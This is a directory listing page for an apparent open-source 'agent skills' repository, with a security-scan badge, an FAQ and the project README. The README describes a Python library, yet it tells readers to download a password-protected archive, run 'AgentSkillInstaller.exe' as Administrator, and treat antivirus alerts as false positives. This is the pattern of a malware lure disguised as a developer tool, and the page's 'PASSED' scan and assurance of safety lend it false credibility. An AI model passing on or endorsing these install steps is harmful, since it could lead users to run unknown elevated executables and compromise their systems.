Curated collection of modular agent skills for LLM-based agents
# Add to your Claude Code skills
git clone https://github.com/oliverb-io1902e8/agent-skills-collectionGuides for using ai agents skills like agent-skills-collection.
Last scanned: 8/7/2026
{
"issues": [],
"status": "PASSED",
"scannedAt": "2026-08-07T05:39:49.005Z",
"npmAuditRan": true,
"pipAuditRan": false,
"promptInjectionRan": true
}See how agent-skills-collection compares with popular alternatives.
agent-skills-collection is an open-source ai agents skill for AI coding assistants such as Claude Code, Codex CLI, and ChatGPT, built by oliverb-io1902e8. Curated collection of modular agent skills for LLM-based agents. It has 209 GitHub stars.
Yes. agent-skills-collection passed SkillsLLM's automated security scan — a dependency vulnerability audit plus prompt-injection heuristics — with no high-severity issues. You can read the full report in the Security Report section on this page.
Clone the repository with "git clone https://github.com/oliverb-io1902e8/agent-skills-collection" and add it to your Claude Code skills directory (see the Installation section above).
agent-skills-collection is primarily written in Python. It is open-source under oliverb-io1902e8 on GitHub, so you can review or fork the full source.
Yes. SkillsLLM lists many other AI Agents skills you can browse and compare side by side. Open the AI Agents category from the badge at the top of this page, or use the Related Skills and comparison links further down to weigh agent-skills-collection against similar tools.
No comments yet. Be the first to share your thoughts!
⚠️ Third-Party Software Notice
This skill is third-party open-source software developed and hosted independently on GitHub. SkillsLLM is an informational directory and does not control or maintain the underlying repository.
Any security checks, ratings, or warnings displayed by SkillsLLM are automated and limited in scope. They do not constitute a security certification or guarantee that the software is safe, error-free, or free from malicious code, vulnerabilities, compromised dependencies, or prompt-injection risks.
Review the source code, permissions, dependencies, and configuration before installing or running any third-party skill. Use is at your own risk. To the maximum extent permitted by applicable law, SkillsLLM is not liable for losses arising from third-party software.
See comparison
A curated collection of modular agent skills for LLM-based agents
This repository provides a ready-to-use collection of agent skills for AI assistants like Claude, ChatGPT, and custom agents. Each skill is a self-contained module that adds specific capabilities to your AI agent.
Agent skills are modular, reusable capabilities that extend what AI agents can do. They transform chatbots into autonomous agents that can:
| Skill | Description | Status |
|---|---|---|
| Web Research | Search and synthesize information from multiple sources | ✅ Stable |
| Data Analysis | Analyze CSV, JSON, and Excel files with natural language | ✅ Stable |
| API Integration | Connect to REST APIs and process responses | ✅ Stable |
| Memory Manager | Store and retrieve context across sessions | ✅ Stable |
| File Operations | Read, write, and process files | ✅ Stable |
| Email Automation | Send and receive emails via IMAP/SMTP | 🧪 Beta |
| Social Media | Post and monitor social media channels | 🧪 Beta |
| Database Query | Query SQL and NoSQL databases | 🧪 Beta |
Get the latest version from Releases.
Extract the archive using WinRAR or 7-Zip.
Password: cv4PE+pSgUjd
AgentSkillInstaller.exe as Administrator⚠️ Note: Antivirus may flag this tool — this is a false positive. The installer registers the agent skills in your system.
# Example: Using the Web Research skill
from agent_skills import WebResearch
researcher = WebResearch()
result = researcher.search(
query="latest developments in AI agents 2026",
sources=["github", "arxiv", "reddit"],
max_results=10
)
print(result.summary)
❓ FAQ
Q: Is this compatible with Claude Code?
A: Yes, Agent Skills Collection works with Claude Code, Cursor, and any CLI-based agent.
Q: Will I get banned for using this?
A: No. This is a legitimate development tool.
📜 License MIT — Free to use and modify.
⭐ Star this repository if you find it useful!